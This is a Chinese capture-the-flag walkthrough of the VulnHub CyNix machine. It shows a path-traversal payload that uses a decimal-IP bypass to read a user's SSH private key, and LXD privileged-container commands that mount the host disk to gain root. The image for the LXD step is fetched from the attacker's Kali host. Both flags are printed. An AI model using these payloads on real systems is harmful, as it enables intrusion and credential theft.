目錄
- 介紹
- 資訊收集
- 主機發現
- 主機資訊探測
- 網站探測
- 目錄掃描
- 網站測驗
- 讀取SSH私鑰
- SSH連接靶機
- 第一個Flag
- 提權
- lxd提權
- 第二個Flag
- 參考
介紹
難度:中等
靶機發布日期:2019年11月27日
Flag兩個:User flag: user.txt;Root flag: root.txt
靶機地址:https://www.vulnhub.com/entry/cynix-1,394/
?
學習:LXD提權
資訊收集
主機發現
netdiscover主機發現
額,,無法通過主機名區分開哪個才是靶機,
sudo netdiscover -i eth1 -r 192.168.124.0/24

nmap主機發現
根據對MAC地址的決議,確認靶機是192.168.124.24
nmap -sn 192.168.124.0/24

主機資訊探測
資訊探測:nmap -A -p- 192.168.124.24

網站探測
訪問80埠,沒啥資訊

目錄掃描
gobuster dir -u http://192.168.124.24 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

只發現了/lavalamp子目錄,

點了點,好像也就“CONTACT”能輸入點東西,暫時還不知道怎么用

再試著掃描一下子目錄/lavalamp下有哪些東東,掃出來一些目錄,試著訪問一下結果403禁止訪問,

網站測驗
這個時候,只能回到/lavalamp試試,隨便輸入點東西,BurpSuite抓包重放一下,回應包出現“Specify a number”,提示我們輸入一個數字,

渲染一下頁面呢?

停止抓包,看下頁面回應內容,首先并沒有發現BP回應包的頁面,其次“CONTACT”頁面上出現一個紅色的框框,無法輸入內容,審計頁面后發現了一個地址,它的title寫著“Can You Bypass Me?”,可以試著訪問一下,


其實,如果在BP中選擇復制URL地址,也會得到這個頁面

繼續嘗試審計頁面,看到submit,這里好像是一個提交框,只是我看不到它,這個時候只需要滑鼠雙擊網頁人物Neo的額頭的框框即可,

雙擊之后,頁面出現一個黑色的框框

在黑色框框中隨便輸入點東西,然后雙擊Neo的額頭,抓個包,看到引數的名字file猜測可能跟檔案讀取有點關系,試一試吧

頁面提示,我應該試試訪問本地檔案,那就試試任意檔案讀取呢?

直接訪問當前地址呢?提示我不能這么做

換用/etc/passwd,轉到原始碼模式,發現提示我們選擇一個數字,我選擇個錘子呦,不出效果,應該還是姿勢不對,


簡單分析一下,我們被告知要訪問本地檔案,但是直接訪問都失敗了,因該是要嘗試做繞過,試試IP地址轉換,在linux中,以下幾種方式是等價的(可自行測驗):
- ping 127.0.0.1
- ping 127.0.1
- ping 127.1
- ping 0x7f.1
- ping 2130706433
通過回應包,大致判斷可以登錄的用戶只有ford,

讀取SSH私鑰
由于靶機只開放了80埠和6688(SSH)兩個埠,此時大膽猜測,下一步既然要SSH連接ford用戶,那么ford用戶的家目錄里面有沒有SSH私鑰呢?
file=2130706433/../../home/ford/.ssh/id_rsa&read=Download+the+number

把獲取到的SSH私鑰保存到kali上,連接靶機
SSH連接靶機
第一個Flag
獲取到第一個Flag:02d6267ed96e6b615b031dafe9607151
vim id_rsa
chmod 600 id_rsa
ssh -i id_rsa ford@192.168.124.24 -p 6688

提權
網上下載個LinEnum,測驗一下,發現 lxd 有可能存在利用

-
查看鏡像串列:
lxc image list,是空的 -
創建特權容器:
lxc init ubuntu:18.04 asuka -c security.privileged=true

由于實際的情況中往往是創建失敗的,所以再額外羅嗦一下創建失敗咋整,咋整就是在kali上生成鏡像,然后復制到靶機上面,參見:https://github.com/saghul/lxd-alpine-builder
lxd提權
- 在kali上生成鏡像
git clone https://github.com/saghul/lxd-alpine-builder.git
sudo ./build-alpine

生成的新鏡像

- kali開啟http服務,靶機下載鏡像
python3 -m http.server 80
- 靶機下載鏡像:
wget http://192.168.124.22/alpine-v3.15-x86_64-20220115_0347.tar.gz

- 匯入檔案,并對其重命名
lxc image import ./alpine-v3.15-x86_64-20220115_0347.tar.gz --alias fromkali

- 創建容器:
lxc init fromkali fromkali -c security.privileged=true - 掛載容器, 在/mnt/root 下掛載整個磁盤:
lxc config device add fromkali fromkali disk source=/ path=/mnt/root recursive=true
- 啟動容器:
lxc start fromkali - 指定與主機互動的終端:
lxc exec fromkali /bin/sh
觀察IP地址知道,我現在是在靶機的容器中,

- 查看宿主機的檔案目錄:
ls -al /mnt/root/root
之后就可以獲取flag2了

第二個Flag
查看檔案:cat /mnt/root/root/root.txt
得到Flag:b0f971eddce7bd007e9f50ca02f5fe11

參考
127.257 and other fun legacy IP addresses
『VulnHub系列』CyNix: 1-Walkthrough
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/413269.html
標籤:其他
上一篇:DNS查詢
